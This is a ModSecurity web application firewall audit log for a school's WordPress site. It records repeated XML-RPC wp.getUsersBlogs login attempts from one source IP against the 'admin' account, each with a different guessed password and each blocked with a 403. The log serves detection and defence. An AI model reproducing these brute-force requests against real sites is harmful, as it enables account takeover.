Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745067956209426 5868 (- - -)
Stopwatch2: 1745067956209426 5868; combined=4137, p1=503, p2=3435, p3=0, p4=0, p5=114, sr=86, sw=85, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4126cf17-Z--
--ad178453-A--
[19/Apr/2025:20:06:57 +0700] aAOf8UruoUXZj665VUHnygAAAMc 103.236.140.4 57098 103.236.140.4 8181
--ad178453-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ad178453-C--
wp.getUsersBlogs
admin
marketing2019
--ad178453-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ad178453-E--
--ad178453-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068017873693 5144 (- - -)
Stopwatch2: 1745068017873693 5144; combined=3699, p1=441, p2=3041, p3=0, p4=0, p5=125, sr=92, sw=92, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ad178453-Z--
--3e25e570-A--
[19/Apr/2025:20:07:57 +0700] aAOgLXNa4dA2HllpK_NvHQAAAIU 103.236.140.4 33708 103.236.140.4 8181
--3e25e570-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--3e25e570-C--
wp.getUsersBlogs
admin
smkn22-jkt_sch_id
--3e25e570-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3e25e570-E--
--3e25e570-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068077144605 4524 (- - -)
Stopwatch2: 1745068077144605 4524; combined=3408, p1=393, p2=2874, p3=0, p4=0, p5=84, sr=80, sw=57, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3e25e570-Z--
--72c2345a-A--
[19/Apr/2025:20:08:58 +0700] aAOgakruoUXZj665VUHqkgAAAMA 103.236.140.4 38646 103.236.140.4 8181
--72c2345a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--72c2345a-C--
wp.getUsersBlogs
admin
matthew1
--72c2345a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--72c2345a-E--
--72c2345a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068138083175 5610 (- - -)
Stopwatch2: 1745068138083175 5610; combined=4047, p1=460, p2=3415, p3=0, p4=0, p5=100, sr=87, sw=72, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--72c2345a-Z--
--14be5f60-A--
[19/Apr/2025:20:09:59 +0700] aAOgpw6cTFSgLAHl7PrNNQAAABA 103.236.140.4 43128 103.236.140.4 8181
--14be5f60-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 231
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--14be5f60-C--
wp.getUsersBlogs
admin
smkn22-jkt-sch-id123
--14be5f60-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--14be5f60-E--
--14be5f60-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068199077567 5339 (- - -)
Stopwatch2: 1745068199077567 5339; combined=3583, p1=427, p2=2986, p3=0, p4=0, p5=102, sr=83, sw=68, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--14be5f60-Z--
--56448c52-A--
[19/Apr/2025:20:11:04 +0700] aAOg6A6cTFSgLAHl7PrO3QAAAAA 103.236.140.4 48952 103.236.140.4 8181
--56448c52-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--56448c52-C--
wp.getUsersBlogs
admin
q1w2e3r4t5
--56448c52-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--56448c52-E--
--56448c52-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068264144796 15715 (- - -)
Stopwatch2: 1745068264144796 15715; combined=24414, p1=428, p2=3052, p3=0, p4=0, p5=10481, sr=78, sw=70, l=0, gc=10383
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--56448c52-Z--
--8363db65-A--
[19/Apr/2025:20:12:08 +0700] aAOhKEruoUXZj665VUHuaQAAAM4 103.236.140.4 54928 103.236.140.4 8181
--8363db65-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--8363db65-C--
wp.getUsersBlogs
admin
Administrator1234
--8363db65-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8363db65-E--
--8363db65-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068328370916 4816 (- - -)
Stopwatch2: 1745068328370916 4816; combined=3224, p1=390, p2=2688, p3=0, p4=0, p5=87, sr=70, sw=59, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8363db65-Z--
--95148b3f-A--
[19/Apr/2025:20:13:10 +0700] aAOhZkruoUXZj665VUHvsAAAAMc 103.236.140.4 60682 103.236.140.4 8181
--95148b3f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--95148b3f-C--
wp.getUsersBlogs
admin
zxcvbn
--95148b3f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--95148b3f-E--
--95148b3f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (30+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068390416671 4662 (- - -)
Stopwatch2: 1745068390416671 4662; combined=3226, p1=413, p2=2662, p3=0, p4=0, p5=89, sr=68, sw=62, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--95148b3f-Z--
--c2207450-A--
[19/Apr/2025:20:14:13 +0700] aAOhpUruoUXZj665VUHwCwAAANI 103.236.140.4 33242 103.236.140.4 8181
--c2207450-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--c2207450-C--
wp.getUsersBlogs
admin
admin098123
--c2207450-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c2207450-E--
--c2207450-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068453327839 5682 (- - -)
Stopwatch2: 1745068453327839 5682; combined=4146, p1=503, p2=3447, p3=0, p4=0, p5=114, sr=93, sw=82, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c2207450-Z--
--11e0f355-A--
[19/Apr/2025:20:15:17 +0700] aAOh5UruoUXZj665VUHwJwAAANI 103.236.140.4 33544 103.236.140.4 8181
--11e0f355-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--11e0f355-C--
wp.getUsersBlogs
admin
mypassword
--11e0f355-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--11e0f355-E--
--11e0f355-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068517699291 5347 (- - -)
Stopwatch2: 1745068517699291 5347; combined=4063, p1=469, p2=3396, p3=0, p4=0, p5=115, sr=90, sw=83, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--11e0f355-Z--
--0d10494d-A--
[19/Apr/2025:20:16:21 +0700] aAOiJXNa4dA2HllpK_N1vgAAAIk 103.236.140.4 33858 103.236.140.4 8181
--0d10494d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--0d10494d-C--
wp.getUsersBlogs
admin
explorer
--0d10494d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0d10494d-E--
--0d10494d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068581896593 5229 (- - -)
Stopwatch2: 1745068581896593 5229; combined=3905, p1=482, p2=3232, p3=0, p4=0, p5=113, sr=92, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0d10494d-Z--
--c7406f21-A--
[19/Apr/2025:20:17:29 +0700] aAOiaevDiFC_ir7MDwbf9wAAAFA 103.236.140.4 34174 103.236.140.4 8181
--c7406f21-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--c7406f21-C--
wp.getUsersBlogs
admin
security
--c7406f21-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c7406f21-E--
--c7406f21-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (13+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068649940563 5687 (- - -)
Stopwatch2: 1745068649940563 5687; combined=4016, p1=473, p2=3367, p3=0, p4=0, p5=104, sr=85, sw=72, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c7406f21-Z--
--6fd1ff74-A--
[19/Apr/2025:20:18:32 +0700] aAOiqOvDiFC_ir7MDwbgFAAAAEc 103.236.140.4 34468 103.236.140.4 8181
--6fd1ff74-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6fd1ff74-C--
wp.getUsersBlogs
admin
qweasdzx
--6fd1ff74-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6fd1ff74-E--
--6fd1ff74-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068712103737 5763 (- - -)
Stopwatch2: 1745068712103737 5763; combined=4058, p1=524, p2=3344, p3=0, p4=0, p5=110, sr=90, sw=80, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6fd1ff74-Z--
--7f47a26c-A--
[19/Apr/2025:20:19:35 +0700] aAOi5-vDiFC_ir7MDwbgHgAAAE0 103.236.140.4 34782 103.236.140.4 8181
--7f47a26c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7f47a26c-C--
wp.getUsersBlogs
admin
123456qwe
--7f47a26c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7f47a26c-E--
--7f47a26c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068775335896 6132 (- - -)
Stopwatch2: 1745068775335896 6132; combined=4126, p1=501, p2=3447, p3=0, p4=0, p5=105, sr=108, sw=73, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7f47a26c-Z--
--7e54a968-A--
[19/Apr/2025:20:20:35 +0700] aAOjIw6cTFSgLAHl7PrScgAAABI 103.236.140.4 35056 103.236.140.4 8181
--7e54a968-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7e54a968-C--
wp.getUsersBlogs
admin
12345zx
--7e54a968-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7e54a968-E--
--7e54a968-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068835460153 5556 (- - -)
Stopwatch2: 1745068835460153 5556; combined=4221, p1=522, p2=3449, p3=0, p4=0, p5=142, sr=120, sw=108, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7e54a968-Z--
--9bd5597e-A--
[19/Apr/2025:20:21:17 +0700] aAOjTUruoUXZj665VUHwrwAAANc 103.236.140.4 35270 103.236.140.4 8181
--9bd5597e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--9bd5597e-C--
wp.getUsersBlogs
admin
1234%^&*
--9bd5597e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9bd5597e-E--
--9bd5597e-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068877708500 4337 (- - -)
Stopwatch2: 1745068877708500 4337; combined=3295, p1=356, p2=2761, p3=0, p4=0, p5=109, sr=79, sw=69, l=0, gc=0
